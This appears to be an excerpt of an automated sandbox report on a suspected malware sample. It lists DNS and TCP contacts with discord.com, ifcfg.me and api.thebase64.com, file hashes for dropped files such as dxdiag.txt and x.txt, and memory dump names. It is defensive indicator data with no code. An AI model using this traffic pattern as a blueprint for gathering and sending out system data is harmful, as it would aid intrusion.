US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 ifcfg.me udp
US 34.172.225.131:80 ifcfg.me tcp
US 8.8.8.8:53 131.225.172.34.in-addr.arpa udp
US 8.8.8.8:53 api.thebase64.com udp
US 172.67.210.100:443 api.thebase64.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 100.210.67.172.in-addr.arpa udp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp

Files

memory/908-1-0x00007FF8A2163000-0x00007FF8A2165000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_seplbejy.aym.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/908-11-0x00000194EC170000-0x00000194EC192000-memory.dmp

memory/908-14-0x00007FF8A2160000-0x00007FF8A2C21000-memory.dmp

memory/908-15-0x00007FF8A2160000-0x00007FF8A2C21000-memory.dmp

memory/1460-16-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-18-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-17-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-22-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-28-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-27-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-26-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-25-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-24-0x00000139051B0000-0x00000139051B1000-memory.dmp

memory/1460-23-0x00000139051B0000-0x00000139051B1000-memory.dmp

\??\c:\dxdiag.txt

MD5 14f366966c1763605aa6939cfe9ea0cd
SHA1 86b247165b6dda23a8fe57541c5f5db1f35ed901
SHA256 c0915a684ece3e7ab8c60a9787fa1a81a8c492ab0041af0a8e6b9ff1618efafa
SHA512 538fda37a1245ed5bf9f4dfbdb032ac732f50af201a37febf9abb640d7b9b1b5f982084655fa37156fa290baccd37a55da864b6e20fb0628bcbec815794c1bdd

C:\Users\Admin\AppData\Local\Temp\x.txt

MD5 69a7bf89dc20b524780cbb7447e34e9f
SHA1 b824ed67b6741a0a94b8f2cc89449f3b783fb9de
SHA256 b36eceb65ade81a9c859af73ce6cfa2a756c85cc9461d523df36546fadd32d44
SHA512 f1ae5eabecaa4b15c2d9b38f6565c48636b6bc1a70fae4a2aa5b4d7b1215d886663b6a2f9c813fb1ef7af3b467cd3fe3bb5276c12b01aa07087237dd373fa780